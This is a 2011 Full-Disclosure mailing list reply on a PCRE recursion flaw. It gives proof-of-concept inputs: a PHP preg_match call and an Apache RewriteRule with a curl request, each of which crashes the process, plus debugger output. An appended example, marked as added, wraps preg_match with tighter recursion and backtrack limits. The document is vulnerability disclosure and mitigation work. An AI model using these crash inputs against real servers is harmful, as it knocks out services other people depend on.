Message-ID: <4EA359A0.6030908@securityreason.com>
Date: Sun, 23 Oct 2011 02:02:40 +0200
From: Maksymilian Arciemowicz <cxib@...urityreason.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: New Opera 11.51 PoC Denial of Service (pigtail23)
stack exhaustion. it seems to be a recursion problem with basic regular
expressions. the same or similar problem exists in PCRE 8.12, allowing
multiple applications to be crashed

cx@...4:/www$ cat crash0.php
<?php
preg_match("/((.*)((!?.*)+)\\w+)/iU",str_repeat(" ",4096),$exxx);
?>
cx@...4:/www$ php crash0.php
Segmentation fault

or, some time ago, for apache:

127# cat .htaccess
RewriteEngine On
RewriteBase /rcrash
RewriteRule gun((.*){2000,}(\s*){2000,}.*) /ygy
127# curl http://127.0.0.1/rcrash/gun
curl: (52) Empty reply from server

[Mon Jul 11 02:40:39 2011] [notice] child pid 1343 exit signal Illegal instruction (4)

Program received signal SIGSEGV, Segmentation fault.
0x08097a9b in match (eptr=0xbb777b07 "", ecode=0xbb76ab6f "*\bB",
offset_top=8, md=0xbfbfe284, ims=0, eptrb=0xbfa02014, flags=2)
at pcre.c:7997
7997 c = *ecode++ - OP_TYPESTAR;

that is the same problem.
- --
Best Regards
pub 4096R/D6E5B530 2010-09-19
uid Maksymilian Arciemowicz (cx) <max@...b.net>
sub 4096R/58BA663C 2010-09-19
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
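
Added example, not part of the original message: a PHP wrapper that bounds the subject length and lowers pcre.recursion_limit and pcre.backtrack_limit around one preg_match() call, so that PCRE stops with an error code when a limit is hit. guarded_preg_match() and the limit values are assumptions, not PHP or PCRE defaults.

```php
<?php
// Added example (not from the original post). guarded_preg_match() is a
// hypothetical helper; the limit values are assumptions to tune per deployment.

const PCRE_ERROR_NAMES = [
    PREG_INTERNAL_ERROR        => 'internal error',
    PREG_BACKTRACK_LIMIT_ERROR => 'backtrack limit reached',
    PREG_RECURSION_LIMIT_ERROR => 'recursion limit reached',
    PREG_JIT_STACKLIMIT_ERROR  => 'JIT stack limit reached',
];

function guarded_preg_match(string $pattern, string $subject, array &$matches = [],
                            int $recursionLimit = 2000, int $backtrackLimit = 100000,
                            int $maxSubjectBytes = 65536): bool
{
    // Bound the input first: match depth grows with subject length.
    if (strlen($subject) > $maxSubjectBytes) {
        throw new LengthException("subject longer than $maxSubjectBytes bytes");
    }
    // Lower the limits for this call only, so PCRE gives up with an error
    // code instead of recursing until the process stack runs out.
    $oldRecursion = ini_set('pcre.recursion_limit', (string) $recursionLimit);
    $oldBacktrack = ini_set('pcre.backtrack_limit', (string) $backtrackLimit);
    try {
        $result = preg_match($pattern, $subject, $matches);
        $error  = preg_last_error();
    } finally {
        if ($oldRecursion !== false) { ini_set('pcre.recursion_limit', $oldRecursion); }
        if ($oldBacktrack !== false) { ini_set('pcre.backtrack_limit', $oldBacktrack); }
    }
    // preg_match() returns false on failure; never treat that as "no match".
    if ($result === false || $error !== PREG_NO_ERROR) {
        $reason = PCRE_ERROR_NAMES[$error] ?? "PCRE error $error";
        throw new RuntimeException("regex aborted: $reason");
    }
    return $result === 1;
}

// The pattern and subject from the post, run through the guard.
try {
    $hit = guarded_preg_match("/((.*)((!?.*)+)\\w+)/iU", str_repeat(" ", 4096), $m);
    echo $hit ? "match\n" : "no match\n";
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
```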